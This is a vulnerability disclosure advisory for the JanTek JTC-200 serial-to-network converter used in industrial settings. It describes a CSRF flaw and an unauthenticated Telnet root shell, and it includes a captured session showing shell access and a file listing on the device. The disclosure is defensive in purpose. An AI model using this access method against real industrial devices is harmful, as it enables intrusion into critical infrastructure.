Vendor: JanTek Equipment: JTC-200 Vulnerabilities: Cross-site Request Forgery, Improper Authentication Advisory URL: https://ipositivesecurity.com/2017/10/28/ics-jantek-jtc-200-rs232-net-converter-advisory-published/ ICS-CERT Advisory https://ics-cert.us-cert.gov/advisories/ICSA-17-283-02 CVE-ID CVE-2016-5789 CVE-2016-5791 Detailed Proof of Concept: https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/ ------------------------ AFFECTED PRODUCTS ------------------------ The following versions of JTC-200, a TCP/IP converter, are affected: JTC-200 all versions. ------------------------ BACKGROUND ------------------------ Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Europe and Asia Company Headquarters Location: Taiwan ------------------------ IMPACT ------------------------ Successful exploitation of these vulnerabilities allow for remote code execution on the device with elevated privileges. ------------------------ VULNERABILITY OVERVIEW ------------------------ CROSS-SITE REQUEST FORGERY (CSRF) CWE-352 An attacker could perform actions with the same permissions as a victim user, provided the victim has an active session and is induced to trigger the malicious request. CVE-2016-5789 has been assigned to this vulnerability. A CVSS v3 base score of 8.0 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H). IMPROPER AUTHENTICATION CWE-287 The improper authentication could provide undocumented Busybox Linux shell accessible over Telnet service without any authentication. CVE-2016-5791 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). --------- Trying IP... Connected to IP. Escape character is '^]'. BusyBox v0.60.4 (2008.02.21-16:59+0000) Built-in shell (msh) Enter 'help' for a list of built-in commands. # BusyBox v0.60.4 (2008.02.21-16:59+0000) multi-call binary Usage: busybox [function] [arguments]... or: [function] [arguments]... BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use, and BusyBox will act like whatever it was invoked as. Currently defined functions: [, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls, mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi # # ls bin dev etc nfs proc swap usb var # cd etc # ls ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc resolv.conf services # cat inetd.conf telnet stream tcpnowait root /bin/telnetd # --------- ------------------------ Technical Details ------------------------ https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/ +++++ Best Regards, Karn Ganeshen